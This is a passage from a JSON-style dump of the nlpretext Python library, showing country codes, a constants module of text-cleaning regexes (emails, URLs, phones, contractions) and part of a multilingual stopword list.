\"KN\",\n    \"KY\",\n    \"LC\",\n    \"MP\",\n    \"MS\",\n    \"PR\",\n    \"SX\",\n    \"TC\",\n    \"TT\",\n    \"VC\",\n    \"VG\",\n    \"VI\",\n    \"RU\",\n    \"KZ\",\n    \"EG\",\n    \"ZA\",\n    \"GR\",\n    \"NL\",\n    \"BE\",\n    \"FR\",\n    \"ES\",\n    \"HU\",\n    \"IT\",\n    \"VA\",\n    \"RO\",\n    \"CH\",\n    \"AT\",\n    \"GB\",\n    \"GG\",\n    \"IM\",\n    \"JE\",\n    \"DK\",\n    \"SE\",\n    \"NO\",\n    \"SJ\",\n    \"PL\",\n    \"DE\",\n    \"PE\",\n    \"MX\",\n    \"CU\",\n    \"AR\",\n    \"BR\",\n    \"CL\",\n    \"CO\",\n    \"VE\",\n    \"MY\",\n    \"AU\",\n    \"CC\",\n    \"CX\",\n    \"ID\",\n    \"PH\",\n    \"NZ\",\n    \"SG\",\n    \"TH\",\n    \"JP\",\n    \"KR\",\n    \"VN\",\n    \"CN\",\n    \"TR\",\n    \"IN\",\n    \"PK\",\n    \"AF\",\n    \"LK\",\n    \"MM\",\n    \"IR\",\n    \"SS\",\n    \"MA\",\n    \"EH\",\n    \"DZ\",\n    \"TN\",\n    \"LY\",\n    \"GM\",\n    \"SN\",\n    \"MR\",\n    \"ML\",\n    \"GN\",\n    \"CI\",\n    \"BF\",\n    \"NE\",\n    \"TG\",\n    \"BJ\",\n    \"MU\",\n    \"LR\",\n    \"SL\",\n    \"GH\",\n    \"NG\",\n    \"TD\",\n    \"CF\",\n    \"CM\",\n    \"CV\",\n    \"ST\",\n    \"GQ\",\n    \"GA\",\n    \"CG\",\n    \"CD\",\n    \"AO\",\n    \"GW\",\n    \"IO\",\n    \"AC\",\n    \"SC\",\n    \"SD\",\n    \"RW\",\n    \"ET\",\n    \"SO\",\n    \"DJ\",\n    \"KE\",\n    \"TZ\",\n    \"UG\",\n    \"BI\",\n    \"MZ\",\n    \"ZM\",\n    \"MG\",\n    \"RE\",\n    \"YT\",\n    \"ZW\",\n    \"NA\",\n    \"MW\",\n    \"LS\",\n    \"BW\",\n    \"SZ\",\n    \"KM\",\n    \"SH\",\n    \"TA\",\n    \"ER\",\n    \"AW\",\n    \"FO\",\n    \"GL\",\n    \"GI\",\n    \"PT\",\n    \"LU\",\n    \"IE\",\n    \"IS\",\n    \"AL\",\n    \"MT\",\n    \"CY\",\n    \"FI\",\n    \"AX\",\n    \"BG\",\n    \"LT\",\n    \"LV\",\n    \"EE\",\n    \"MD\",\n    \"AM\",\n    \"BY\",\n    \"AD\",\n    \"MC\",\n    \"SM\",\n    \"UA\",\n    \"RS\",\n    \"ME\",\n    \"XK\",\n    \"HR\",\n    \"SI\",\n    \"BA\",\n    \"MK\",\n    \"CZ\",\n    \"SK\",\n    \"LI\",\n    \"FK\",\n    \"BZ\",\n    \"GT\",\n    \"SV\",\n    \"HN\",\n    \"NI\",\n    \"CR\",\n    \"PA\",\n    \"PM\",\n    \"HT\",\n    \"GP\",\n    \"BL\",\n    \"MF\",\n    \"BO\",\n    \"GY\",\n    \"EC\",\n    \"GF\",\n    \"PY\",\n    \"MQ\",\n    \"SR\",\n    \"UY\",\n    \"CW\",\n    \"BQ\",\n    \"TL\",\n    \"NF\",\n    \"BN\",\n    \"NR\",\n    \"PG\",\n    \"TO\",\n    \"SB\",\n    \"VU\",\n    \"FJ\",\n    \"PW\",\n    \"WF\",\n    \"CK\",\n    \"NU\",\n    \"WS\",\n    \"KI\",\n    \"NC\",\n    \"TV\",\n    \"PF\",\n    \"TK\",\n    \"FM\",\n    \"MH\",\n    \"KP\",\n    \"HK\",\n    \"MO\",\n    \"KH\",\n    \"LA\",\n    \"BD\",\n    \"TW\",\n    \"MV\",\n    \"LB\",\n    \"JO\",\n    \"SY\",\n    \"IQ\",\n    \"KW\",\n    \"SA\",\n    \"YE\",\n    \"OM\",\n    \"PS\",\n    \"AE\",\n    \"IL\",\n    \"BH\",\n    \"QA\",\n    \"BT\",\n    \"MN\",\n    \"NP\",\n    \"TJ\",\n    \"TM\",\n    \"AZ\",\n    \"GE\",\n    \"KG\",\n    \"UZ\",\n    \"DO\",\n]\n\nFORMAT_NUMBERS = {\n    \"E164\": _phonenumbers.PhoneNumberFormat.E164,\n    \"INTERNATIONAL\": _phonenumbers.PhoneNumberFormat.INTERNATIONAL,\n    \"NATIONAL\": _phonenumbers.PhoneNumberFormat.NATIONAL,\n    \"RFC3966\": _phonenumbers.PhoneNumberFormat.RFC3966,\n}\n"
  },
  {
    "path": "nlpretext/_config/constants.py",
    "content": "# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License\n# mypy: disable-error-code=\"attr-defined\"\n\n\"\"\"\nCollection of regular expressions and other (small, generally useful) constants.\nCredits to textacy for some of them: https://github.com/chartbeat-labs/textacy.\n\"\"\"\nimport re\nimport sys\nimport unicodedata\n\nimport regex\n\nNUMERIC_NE_TYPES = {\n    \"ORDINAL\",\n    \"CARDINAL\",\n    \"MONEY\",\n    \"QUANTITY\",\n    \"PERCENT\",\n    \"TIME\",\n    \"DATE\",\n}\nSUBJ_DEPS = {\"agent\", \"csubj\", \"csubjpass\", \"expl\", \"nsubj\", \"nsubjpass\"}\nOBJ_DEPS = {\"attr\", \"dobj\", \"dative\", \"oprd\"}\nAUX_DEPS = {\"aux\", \"auxpass\", \"neg\"}\n\nREPORTING_VERBS = {\n    \"according\",\n    \"accuse\",\n    \"acknowledge\",\n    \"add\",\n    \"admit\",\n    \"agree\",\n    \"allege\",\n    \"announce\",\n    \"argue\",\n    \"ask\",\n    \"assert\",\n    \"believe\",\n    \"blame\",\n    \"charge\",\n    \"cite\",\n    \"claim\",\n    \"complain\",\n    \"concede\",\n    \"conclude\",\n    \"confirm\",\n    \"contend\",\n    \"criticize\",\n    \"declare\",\n    \"decline\",\n    \"deny\",\n    \"describe\",\n    \"disagree\",\n    \"disclose\",\n    \"estimate\",\n    \"explain\",\n    \"fear\",\n    \"hope\",\n    \"insist\",\n    \"maintain\",\n    \"mention\",\n    \"note\",\n    \"observe\",\n    \"order\",\n    \"predict\",\n    \"promise\",\n    \"recall\",\n    \"recommend\",\n    \"reply\",\n    \"report\",\n    \"say\",\n    \"state\",\n    \"stress\",\n    \"suggest\",\n    \"tell\",\n    \"testify\",\n    \"think\",\n    \"urge\",\n    \"warn\",\n    \"worry\",\n    \"write\",\n}\n\nCURRENCIES = {\n    \"$\": \"USD\",\n    \"zł\": \"PLN\",\n    \"£\": \"GBP\",\n    \"¥\": \"JPY\",\n    \"฿\": \"THB\",\n    \"₡\": \"CRC\",\n    \"₦\": \"NGN\",\n    \"₩\": \"KRW\",\n    \"₪\": \"ILS\",\n    \"₫\": \"VND\",\n    \"€\": \"EUR\",\n    \"₱\": \"PHP\",\n    \"₲\": \"PYG\",\n    \"₴\": \"UAH\",\n    \"₹\": \"INR\",\n}\n\nPOS_REGEX_PATTERNS = {\n    \"en\": {\n        \"NP\": r\"<DET>? <NUM>* (<ADJ> <PUNCT>? <CONJ>?)* (<NOUN>|<PROPN> <PART>?)+\",\n        \"PP\": r\"<ADP> <DET>? <NUM>* (<ADJ> <PUNCT>? <CONJ>?)* (<NOUN> <PART>?)+\",\n        \"VP\": r\"<AUX>* <ADV>* <VERB>\",\n    }\n}\n\nPUNCT_TRANSLATE_UNICODE = dict.fromkeys(\n    (i for i in range(sys.maxunicode) if unicodedata.category(chr(i)).startswith(\"P\")),\n    \" \",\n)\n\n\nACRONYM_REGEX = re.compile(\n    r\"(?:^|(?<=\\W))(?:(?:(?:(?:[A-Z]\\.?)+[a-z0-9&/-]?)+(?:[A-Z][s.]?|[0-9]s?))|(?:[0-9](?:\\-?[A-Z])+))(?:$|(?=\\W))\",\n    flags=re.UNICODE,\n)\nEMAIL_REGEX = re.compile(\n    r\"(?:^|(?<=[^\\w@.)]))([\\w+-](\\.(?!\\.))?)*?[\\w+-]@(?:\\w-?)*?\\w+(\\.([a-z]{2,})){1,3}(?:$|(?=\\b))\",\n    flags=re.IGNORECASE | re.UNICODE,\n)\nPHONE_REGEX = re.compile(\n    r\"(?:^|(?<=[^\\w)]))(\\+?1[ .-]?)?(\\(?\\d{3}\\)?[ .-]?)?(\\d{3}[ .-]?\\d{4})(\\s?(?:ext\\.?|[#x-])\\s?\\d{2,6})?(?:$|(?=\\W))\"  # noqa: E501\n)\nNUMBERS_REGEX = re.compile(\n    r\"(?:^|(?<=[^\\w,.]))[+–-]?(([1-9]\\d{0,2}(,\\d{3})+(\\.\\d*)?)|([1-9]\\d{0,2}([ .]\\d{3})+(,\\d*)?)|\"\n    r\"(\\d*?[.,]\\d+)|\\d+)(?:|(?=\\b))\"\n)\nCURRENCY_REGEX = re.compile(\"({})+\".format(\"|\".join(re.escape(c) for c in CURRENCIES)))\nLINEBREAK_REGEX = re.compile(r\"((\\r\\n)|[\\n\\v])+\")\nNONBREAKING_SPACE_REGEX = re.compile(r\"(?!\\n)\\s+\")\nURL_REGEX = re.compile(\n    r\"(?:|(?<![\\w/.]))\"\n    # protocol identifier\n    # r\"(?:(?:https?|ftp)://)\"  <-- alt?\n    r\"(?:(?:https?://|mailto:|ftp://|www\\d{0,3}\\.))\"\n    # user:pass authentication\n    r\"(?:\\S+(?::\\S*)?@)?\" r\"(?:\"\n    # IP address exclusion\n    # private & local networks\n    r\"(?!(?:10|127)(?:\\.\\d{1,3}){3})\"\n    r\"(?!(?:169\\.254|192\\.168)(?:\\.\\d{1,3}){2})\"\n    r\"(?!172\\.(?:1[6-9]|2\\d|3[0-1])(?:\\.\\d{1,3}){2})\"\n    # IP address dotted notation octets\n    # excludes loopback network 0.0.0.0\n    # excludes reserved space >= 224.0.0.0\n    # excludes network & broadcast addresses\n    # (first & last IP address of each class)\n    r\"(?:[1-9]\\d?|1\\d\\d|2[01]\\d|22[0-3])\"\n    r\"(?:\\.(?:1?\\d{1,2}|2[0-4]\\d|25[0-5])){2}\"\n    r\"(?:\\.(?:[1-9]\\d?|1\\d\\d|2[0-4]\\d|25[0-4]))\"\n    r\"|\"\n    # host name\n    r\"(?:(?:[a-z\\u00a1-\\uffff0-9]-?)*[a-z\\u00a1-\\uffff0-9]+)\"\n    # domain name\n    r\"(?:\\.(?:[a-z\\u00a1-\\uffff0-9]-?)*[a-z\\u00a1-\\uffff0-9]+)*\"\n    # TLD identifier\n    r\"(?:\\.(?:[a-z\\u00a1-\\uffff]{2,}))\" r\")\"\n    # port number\n    r\"(?::\\d{2,5})?\"\n    # resource path\n    r\"(?:/\\S*)?\" r\"(?:$|(?![\\w?!+&/]))\",\n    flags=re.UNICODE | re.IGNORECASE,\n)  # source: https://gist.github.com/dperini/729294\nSHORT_URL_REGEX = re.compile(\n    r\"(?:^|(?<![\\w/.]))\"\n    # optional scheme\n    r\"(?:(?:https?://)?)\"\n    # domain\n    r\"(?:\\w-?)*?\\w+(?:\\.[a-z]{2,12}){1,3}\" r\"/\"\n    # hash\n    r\"[^\\s.,?!'\\\"|+]{2,12}\" r\"(?:$|(?![\\w?!+&/]))\",\n    flags=re.IGNORECASE,\n)\n\n# regexes for cleaning up crufty terms\nDANGLING_PARENS_TERM_RE = re.compile(\n    r\"(?:\\s|^)(\\()\\s{1,2}(.*?)\\s{1,2}(\\))(?:\\s|$)\", flags=re.UNICODE\n)\nLEAD_TAIL_CRUFT_TERM_RE = re.compile(r\"^([^\\w(-] ?)+|([^\\w).!?] ?)+$\", flags=re.UNICODE)\nLEAD_HYPHEN_TERM_RE = re.compile(r\"^-([^\\W\\d_])\", flags=re.UNICODE)\nNEG_DIGIT_TERM_RE = re.compile(r\"(-) (\\d)\", flags=re.UNICODE)\nWEIRD_HYPHEN_SPACE_TERM_RE = re.compile(r\"(?<=[^\\W\\d]) (-[^\\W\\d])\", flags=re.UNICODE)\nWEIRD_APOSTR_SPACE_TERM_RE = re.compile(r\"([^\\W\\d]+) ('[a-z]{1,2}\\b)\", flags=re.UNICODE)\nLATIN_CHARACTERS_RE = regex.compile(r\"[^\\p{Latin}1-9]\")\n\n# ENGLISH CONTRACTIONS\nCONTRACTION_NT_NOT = re.compile(\n    r\"(\\b)(are|could|did|does|do|had|has|have|is|might|must|should|were|would)n't\", re.IGNORECASE\n)\nCONTRACTION_LL_WILL = re.compile(r\"(\\b)(he|i|she|they|we|what|who|you)'ll\", re.IGNORECASE)\nCONTRACTION_RE_ARE = re.compile(r\"(\\b)(they|we|what|who|you)'re\", re.IGNORECASE)\nCONTRACTION_VE_HAVE = re.compile(r\"(\\b)(i|should|they|we|what|who|would|you)'ve\", re.IGNORECASE)\nCONTRACTION_CANT_CANNOT = re.compile(r\"(\\b)(ca)n't\", re.IGNORECASE)\nCONTRACTION_M_AM = re.compile(r\"(\\b)(i)'m\", re.IGNORECASE)\nCONTRACTION_LET_LETUS = re.compile(r\"(\\b)(let)'s\", re.IGNORECASE)\nCONTRACTION_WONT_WILLNOT = re.compile(r\"(\\b)(w)on't\", re.IGNORECASE)\nCONTRACTION_SHANT_SHALLNOT = re.compile(r\"(\\b)(s)han't\", re.IGNORECASE)\nCONTRACTION_YALL_YOUALL = re.compile(r\"(\\b)(y)(?:'all|a'll)\", re.IGNORECASE)\n\n# SOCIAL DATA\nHASHTAG_PATTERN = re.compile(r\"#\\w*\")\nAT_PATTERN = re.compile(r\"@\\w*\")\nHTML_TAG_PATTERN = re.compile(r\"<.*?>\")\n\n# TEXT LOADER\nTEXT_FILE_FORMATS_PATTERN = re.compile(r\"^.*\\.(json|csv|txt|parquet)(\\.gz|\\.zip)*$\")\n"
  },
  {
    "path": "nlpretext/_config/stopwords.py",
    "content": "STOPWORDS = {\n    \"af\": [\n        \"'n\",\n        \"aan\",\n        \"af\",\n        \"al\",\n        \"as\",\n        \"baie\",\n        \"by\",\n        \"daar\",\n        \"dag\",\n        \"dat\",\n        \"die\",\n        \"dit\",\n        \"een\",\n        \"ek\",\n        \"en\",\n        \"gaan\",\n        \"gesê\",\n        \"haar\",\n        \"het\",\n        \"hom\",\n        \"hulle\",\n        \"hy\",\n        \"in\",\n        \"is\",\n        \"jou\",\n        \"jy\",\n        \"kan\",\n        \"kom\",\n        \"ma\",\n        \"maar\",\n        \"met\",\n        \"my\",\n        \"na\",\n        \"nie\",\n        \"om\",\n        \"ons\",\n        \"op\",\n        \"saam\",\n        \"sal\",\n        \"se\",\n        \"sien\",\n        \"so\",\n        \"sy\",\n        \"te\",\n        \"toe\",\n        \"uit\",\n        \"van\",\n        \"vir\",\n        \"was\",\n        \"wat\",\n        \"ŉ\",\n    ],\n    \"ha\": [\n        \"a\",\n        \"amma\",\n        \"ba\",\n        \"ban\",\n        \"ce\",\n        \"cikin\",\n        \"da\",\n        \"don\",\n        \"ga\",\n        \"in\",\n        \"ina\",\n        \"ita\",\n        \"ji\",\n        \"ka\",\n        \"ko\",\n        \"kuma\",\n        \"lokacin\",\n        \"ma\",\n        \"mai\",\n        \"na\",\n        \"ne\",\n        \"ni\",\n        \"sai\",\n        \"shi\",\n        \"su\",\n        \"suka\",\n        \"sun\",\n        \"ta\",\n        \"tafi\",\n        \"take\",\n        \"tana\",\n        \"wani\",\n        \"wannan\",\n        \"wata\",\n        \"ya\",\n        \"yake\",\n        \"yana\",\n        \"yi\",\n        \"za\",\n    ],\n    \"so\": [\n        \"aad\",\n        \"albaabkii\",\n        \"atabo\",\n        \"ay\",\n        \"ayaa\",\n        \"ayee\",\n        \"ayuu\",\n        \"dhan\",\n        \"hadana\",\n        \"in\",\n        \"inuu\",\n        \"isku\",\n        \"jiray\",\n        \"jirtay\",\n        \"ka\",\n        \"kale\",\n        \"kasoo\",\n        \"ku\",\n        \"kuu\",\n        \"lakin\",\n        \"markii\",\n        \"oo\",\n        \"si\",\n        \"soo\",\n        \"uga\",\n        \"ugu\",\n        \"uu\",\n        \"waa\",\n        \"waxa\",\n        \"waxuu\",\n    ],\n    \"st\": [\n        \"a\",\n        \"ba\",\n        \"bane\",\n        \"bona\",\n        \"e\",\n        \"ea\",\n        \"eaba\",\n        \"empa\",\n        \"ena\",\n        \"ha\",\n        \"hae\",\n        \"hape\",\n        \"ho\",\n        \"hore\",\n        \"ka\",\n        \"ke\",\n        \"la\",\n        \"le\",\n        \"li\",\n        \"me\",\n        \"mo\",\n        \"moo\",\n        \"ne\",\n        \"o\",\n        \"oa\",\n        \"re\",\n        \"sa\",\n        \"se\",\n        \"tloha\",\n        \"tsa\",\n        \"tse\",\n    ],\n    \"sw\": [\n        \"akasema\",\n        \"alikuwa\",\n        \"alisema\",\n        \"baada\",\n        \"basi\",\n        \"bila\",\n        \"cha\",\n        \"chini\",\n        \"hadi\",\n        \"hapo\",\n        \"hata\",\n        \"hivyo\",\n        \"hiyo\",\n        \"huku\",\n        \"huo\",\n        \"ili\",\n        \"ilikuwa\",\n        \"juu\",\n        \"kama\",\n        \"karibu\",\n        \"katika\",\n        \"kila\",\n        \"kima\",\n        \"kisha\",\n        \"kubwa\",\n        \"kutoka\",\n        \"kuwa\",\n        \"kwa\",\n        \"kwamba\",\n        \"kwenda\",\n        \"kwenye\",\n        \"la\",\n        \"lakini\",\n        \"mara\",\n        \"mdogo\",\n        \"mimi\",\n        \"mkubwa\",\n        \"mmoja\",\n        \"moja\",\n        \"muda\",\n        \"mwenye\",\n        \"na\",\n        \"naye\",\n        \"ndani\",\n        \"ng\",\n        \"ni\",\n        \"nini\",\n        \"nonkungu\",\n        \"pamoja\",\n        \"pia\",\n        \"sana\",\n        \"sasa\",\n        \"sauti\",\n        \"tafadhali\",\n        \"tena\",\n        \"tu\",\n        \"vile\",\n        \"wa\",\n        \"wakati\",\n        \"wake\",\n        \"walikuwa\",\n        \"wao\",\n        \"watu\",\n        \"wengine\",\n        \"wote\",\n        \"ya\",\n        \"yake\",\n        \"yangu\",\n        \"yao\",\n        \"yeye\",\n        \"yule\",\n        \"za\",\n        \"zaidi\",\n        \"zake\",\n    ],\n    \"yo\": [\n        \"a\",\n        \"an\",\n        \"bá\",\n        \"bí\",\n        \"bẹ̀rẹ̀\",\n        \"fún\",\n        \"fẹ́\",\n        \"gbogbo\",\n        \"inú\",\n        \"jù\",\n        \"jẹ\",\n        \"jẹ́\",\n        \"kan\",\n        \"kì\",\n        \"kí\",\n        \"kò\",\n        \"láti\",\n        \"lè\",\n        \"lọ\",\n        \"mi\",\n        \"mo\",\n        \"máa\",\n        \"mọ̀\",\n        \"ni\",\n        \"náà\",\n        \"ní\",\n        \"nígbà\",\n        \"nítorí\",\n        \"nǹkan\",\n        \"o\",\n        \"padà\",\n        \"pé\",\n        \"púpọ̀\",\n        \"pẹ̀lú\",\n        \"rẹ̀\",\n        \"sì\",\n        \"sí\",\n        \"sínú\",\n        \"ṣ\",\n        \"ti\",\n        \"tí\",\n        \"wà\",\n        \"wá\",\n        \"wọn\",\n        \"wọ́n\",\n        \"yìí\",\n        \"àti\",\n        \"àwọn\",\n        \"é\",\n        \"í\",\n        \"òun\",\n        \"ó\",\n        \"ń\",\n        \"ńlá\",\n        \"ṣe\",\n        \"ṣé\",\n        \"ṣùgbọ́n\",\n        \"ẹmọ́\",\n        \"ọjọ́\",\n        \"ọ̀pọ̀lọpọ̀\",\n    ],\n    \"zu\": [\n        \"futhi\",\n        \"kahle\",\n        \"kakhulu\",\n        \"kanye\",\n        \"khona\",\n        \"kodwa\",\n        \"kungani\",\n        \"kusho\",\n        \"la\",\n        \"lakhe\",\n        \"lapho\",\n        \"mina\",\n        \"ngesikhathi\",\n        \"nje\",\n        \"phansi\",\n        \"phezulu\",\n        \"u\",\n        \"ukuba\",\n        \"ukuthi\",\n        \"ukuze\",\n        \"uma\",\n        \"wahamba\",\n        \"wakhe\",\n        \"wami\",\n        \"wase\",\n        \"wathi\",\n        \"yakhe\",\n        \"zakhe\",\n        \"zonke\",\n    ],\n    \"da\": [\n        \"af\",\n        \"alle\",\n        \"andet\",\n        \"andre\",\n        \"at\",\n        \"begge\",\n        \"da\",\n        \"de\",\n        \"den\",\n        \"denne\",\n        \"der\",\n        \"deres\",\n        \"det\",\n        \"dette\",\n        \"dig\",\n        \"din\",\n        \"dog\",\n        \"du\",\n        \"ej\",\n        \"eller\",\n        \"en\",\n        \"end\",\n        \"ene\",\n        \"eneste\",\n        \"enhver\",\n        \"et\",\n        \"fem\",\n        \"fire\",\n        \"flere\",\n        \"fleste\",\n        \"for\",\n        \"fordi\",\n        \"forrige\",\n        \"fra\",\n        \"få\",\n        \"før\",\n        \"god\",\n        \"han\",\n        \"hans\",\n        \"har\",\n        \"hendes\",\n        \"her\",\n        \"hun\",\n        \"hvad\",\n        \"hvem\",\n        \"hver\",\n        \"hvilken\",\n        \"hvis\",\n        \"hvor\",\n        \"hvordan\",\n        \"hvorfor\",\n        \"hvornår\",\n        \"i\",\n        \"ikke\",\n        \"ind\",\n        \"ingen\",\n        \"intet\",\n        \"jeg\",\n        \"jeres\",\n        \"kan\",\n        \"kom\",\n        \"kommer\",\n        \"lav\",\n        \"lidt\",\n        \"lille\",\n        \"man\",\n        \"mand\",\n        \"mange\",\n        \"med\",\n        \"meget\",\n        \"men\",\n        \"mens\",\n        \"mere\",\n        \"mig\",\n        \"ned\",\n        \"ni\",\n        \"nogen\",\n        \"noget\",\n        \"ny\",\n        \"nyt\",\n        \"nær\",\n        \"næste\",\n        \"næsten\",\n        \"og\",\n        \"op\",\n        \"otte\",\n        \"over\",\n        \"på\",\n        \"se\",\n        \"seks\",\n        \"ses\",\n        \"som\",\n        \"stor\",\n        \"store\",\n        \"syv\",\n        \"ti\",\n        \"til\",\n        \"to\",\n        \"tre\",\n        \"ud\",\n        \"var\",\n    ],\n    \"de\": [\n        \"Ernst\",\n        \"Ordnung\",\n        \"Schluss\",\n        \"a\",\n        \"ab\",\n        \"aber\",\n        \"ach\",\n        \"acht\",\n        \"achte\",\n        \"achten\",\n        \"achter\",\n        \"achtes\",\n        \"ag\",\n        \"alle\",\n        \"allein\",\n        \"allem\",\n        \"allen\",\n        \"aller\",\n        \"allerdings\",\n        \"alles\",\n        \"allgemeinen\",\n        \"als\",\n        \"also\",\n        \"am\",\n        \"an\",\n        \"andere\",\n        \"anderen\",\n        \"andern\",\n        \"anders\",\n        \"au\",\n        \"auch\",\n        \"auf\",\n        \"aus\",\n        \"ausser\",\n        \"ausserdem\",\n        \"außer\",\n        \"außerdem\",\n        \"b\",\n        \"bald\",\n        \"bei\",\n        \"beide\",\n        \"beiden\",\n        \"beim\",\n        \"beispiel\",\n        \"bekannt\",\n        \"bereits\",\n        \"besonders\",\n        \"besser\",\n        \"besten\",\n        \"bin\",\n        \"bis\",\n        \"bisher\",\n        \"bist\",\n        \"c\",\n        \"d\",\n        \"d.h\",\n        \"da\",\n        \"dabei\",\n        \"dadurch\",\n        \"dafür\",\n        \"dagegen\",\n        \"daher\",\n        \"dahin\",\n        \"dahinter\",\n        \"damals\",\n        \"damit\",\n        \"danach\",\n        \"daneben\",\n        \"dank\",\n        \"dann\",\n        \"daran\",\n        \"darauf\",\n        \"daraus\",\n        \"darf\",\n        \"darfst\",\n        \"darin\",\n        \"darum\",\n        \"darunter\",\n        \"darüber\",\n        \"das\",\n        \"dasein\",\n        \"daselbst\",\n        \"dass\",\n        \"dasselbe\",\n        \"davon\",\n        \"davor\",\n        \"dazu\",\n        \"dazwischen\",\n        \"daß\",\n        \"dein\",\n        \"deine\",\n        \"deinem\",\n        \"deiner\",\n        \"dem\",\n        \"dementsprechend\",\n        \"demgegenüber\",\n        \"demgemäss\",\n        \"demgemäß\",\n        \"demselben\",\n        \"demzufolge\",\n        \"den\",\n        \"denen\",\n        \"denn\",\n        \"denselben\",\n        \"der\",\n        \"deren\",\n        \"derjenige\",\n        \"derjenigen\",\n        \"dermassen\",\n        \"dermaßen\",\n        \"derselbe\",\n        \"derselben\",\n        \"des\",\n        \"deshalb\",\n        \"desselben\",\n        \"dessen\",\n        \"deswegen\",\n        \"dich\",\n        \"die\",\n        \"diejenige\",\n        \"diejenigen\",\n        \"dies\",\n        \"diese\",\n        \"dieselbe\",\n        \"dieselben\",\n        \"diesem\",\n        \"diesen\",\n        \"dieser\",\n        \"dieses\",\n        \"dir\",\n        \"doch\",\n        \"dort\",\n        \"drei\",\n        \"drin\",\n        \"dritte\",\n        \"dritten\",\n        \"dritter\",\n        \"drittes\",\n        \"du\",\n        \"durch\",\n        \"durchaus\",\n        \"durfte\",\n        \"durften\",\n        \"dürfen\",\n        \"dürft\",\n        \"e\",\n        \"eben\",\n        \"ebenso\",\n        \"ehrlich\",\n        \"ei\",\n        \"ei,\",\n        \"eigen\",\n        \"eigene\",\n        \"eigenen\",\n        \"eigener\",\n        \"eigenes\",\n        \"ein\",\n        \"einander\",\n        \"eine\",\n        \"einem\",\n        \"einen\",\n        \"einer\",\n        \"eines\",\n        \"einige\",\n        \"einigen\",\n        \"einiger\",\n        \"einiges\",\n        \"einmal\",\n        \"eins\",\n        \"elf\",\n        \"en\",\n        \"ende\",\n        \"endlich\",\n        \"entweder\",\n        \"er\",\n        \"erst\",\n        \"erste\",\n        \"ersten\",\n        \"erster\",\n        \"erstes\",\n        \"es\",\n        \"etwa\",\n        \"etwas\",\n        \"euch\",\n        \"euer\",\n        \"eure\",\n        \"f\",\n        \"folgende\",\n        \"früher\",\n        \"fünf\",\n        \"fünfte\",\n        \"fünften\",\n        \"fünfter\",\n        \"fünftes\",\n        \"für\",\n        \"g\",\n        \"gab\",\n        \"ganz\",\n        \"ganze\",\n        \"ganzen\",\n        \"ganzer\",\n        \"ganzes\",\n        \"gar\",\n        \"gedurft\",\n        \"gegen\",\n        \"gegenüber\",\n        \"gehabt\",\n        \"gehen\",\n        \"geht\",\n        \"gekannt\",\n        \"gekonnt\",\n        \"gemacht\",\n        \"gemocht\",\n        \"gemusst\",\n        \"genug\",\n        \"gerade\",\n        \"gern\",\n        \"gesagt\",\n        \"geschweige\",\n        \"gewesen\",\n        \"gewollt\",\n        \"geworden\",\n        \"gibt\",\n        \"ging\",\n        \"gleich\",\n        \"gott\",\n        \"gross\",\n        \"grosse\",\n        \"grossen\",\n        \"grosser\",\n        \"grosses\",\n        \"groß\",\n        \"große\",\n        \"großen\",\n        \"großer\",\n        \"großes\",\n        \"gut\",\n        \"gute\",\n        \"guter\",\n        \"gutes\",\n        \"h\",\n        \"habe\",\n        \"haben\",\n        \"habt\",\n        \"hast\",\n        \"hat\",\n        \"hatte\",\n        \"hatten\",\n        \"hattest\",\n        \"hattet\",\n        \"heisst\",\n        \"her\",\n        \"heute\",\n        \"hier\",\n        \"hin\",\n        \"hinter\",\n        \"hoch\",\n        \"hätte\",\n        \"hätten\",\n        \"i\",\n        \"ich\",\n        \"ihm\",\n        \"ihn\",\n        \"ihnen\",\n        \"ihr\",\n        \"ihre\",\n        \"ihrem\",\n        \"ihren\",\n        \"ihrer\",\n        \"ihres\",\n        \"im\",\n        \"immer\",\n        \"in\",\n        \"indem\",\n        \"infolgedessen\",\n        \"ins\",\n        \"irgend\",\n        \"ist\",\n        \"j\",\n        \"ja\",\n        \"jahr\",\n        \"jahre\",\n        \"jahren\",\n        \"je\",\n        \"jede\",\n        \"jedem\",\n        \"jeden\",\n        \"jeder\",\n        \"jedermann\",\n        \"jedermanns\",\n        \"jedes\",\n        \"jedoch\",\n        \"jemand\",\n        \"jemandem\",\n        \"jemanden\",\n        \"jene\",\n        \"jenem\",\n        \"jenen\",\n        \"jener\",\n        \"jenes\",\n        \"jetzt\",\n        \"k\",\n        \"kam\",\n        \"kann\",\n        \"kannst\",\n        \"kaum\",\n        \"kein\",\n        \"keine\",\n        \"keinem\",\n        \"keinen\",\n        \"keiner\",\n        \"kleine\",\n        \"kleinen\",\n        \"kleiner\",\n        \"kleines\",\n        \"kommen\",\n        \"kommt\",\n        \"konnte\",\n        \"konnten\",\n        \"kurz\",\n        \"können\",\n        \"könnt\",\n        \"könnte\",\n        \"l\",\n        \"lang\",\n        \"lange\",\n        \"leicht\",\n        \"leide\",\n        \"lieber\",\n        \"los\",\n        \"m\",\n        \"machen\",\n        \"macht\",\n        \"machte\",\n        \"mag\",\n        \"magst\",\n        \"mahn\",\n        \"mal\",\n        \"man\",\n        \"manche\",\n        \"manchem\",\n        \"manchen\",\n        \"mancher\",\n        \"manches\",\n        \"mann\",\n        \"mehr\",\n        \"mein\",\n        \"meine\",\n        \"meinem\",\n        \"meinen\",\n        \"meiner\",\n        \"meines\",\n        \"mensch\",\n        \"menschen\",\n        \"mich\",\n        \"mir\",\n        \"mit\",\n        \"mittel\",\n        \"mochte\",\n        \"mochten\",\n        \"morgen\",\n        \"muss\",\n        \"musst\",\n        \"musste\",\n        \"mussten\",\n        \"muß\",\n        \"mußt\",\n        \"möchte\",\n        \"mögen\",\n        \"möglich\",\n        \"mögt\",\n        \"müssen\",\n        \"müsst\",\n        \"müßt\",\n        \"n\",\n        \"na\",\n        \"nach\",\n        \"nachdem\",\n        \"nahm\",\n        \"natürlich\",\n        \"neben\",\n        \"nein\",\n        \"neue\",\n        \"neuen\",\n        \"neun\",\n        \"neunte\",\n        \"neunten\",\n        \"neunter\",\n        \"neuntes\",\n        \"nicht\",\n        \"nichts\",\n        \"nie\",\n        \"niemand\",\n        \"niemandem\",\n        \"niemanden\",\n        \"noch\",\n        \"nun\",\n        \"nur\",\n        